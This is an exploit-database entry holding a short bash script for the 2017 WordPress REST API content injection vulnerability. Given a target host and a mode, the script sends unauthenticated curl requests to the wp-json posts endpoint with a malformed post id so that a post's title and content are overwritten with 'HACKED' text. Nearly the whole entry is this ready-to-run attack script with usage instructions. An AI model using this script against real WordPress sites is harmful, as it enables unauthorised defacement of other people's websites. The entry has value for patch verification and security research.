id: 26942
date: 02/09/2017
title: WordPress wp-json Content Injection Vulnerability
author: Larry Cashdollar
cves: 

#!/bin/bash
#Wordpress wp_Json API exploit
#Larry W. Cashdollar
#Discovered by Marc Montipas
#http://www.vapidlabs.com/exploits/wordpress_exploit.sh.txt
#https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html?utm_campaign=wp472vuln
#Usage ./exp.sh target 1 or 2 

if [ $2 == 2 ]
  then
  curl -s --url "http://$1/index.php/wp-json/wp/v2/posts/12345?id=1T" --data 'title=HACKED&content=HACKED' | indent
fi

if [ $2 == 1 ]
  then
  curl -s -X POST --url "http://$1/index.php/wp-json/wp/v2/posts/5" --data '{"id":"1k","title":"11Hacked1","content":"11Hacked1"}' -H 'Content-Type: application/json'| indent
fi

#  0day.today [2023-03-27]  #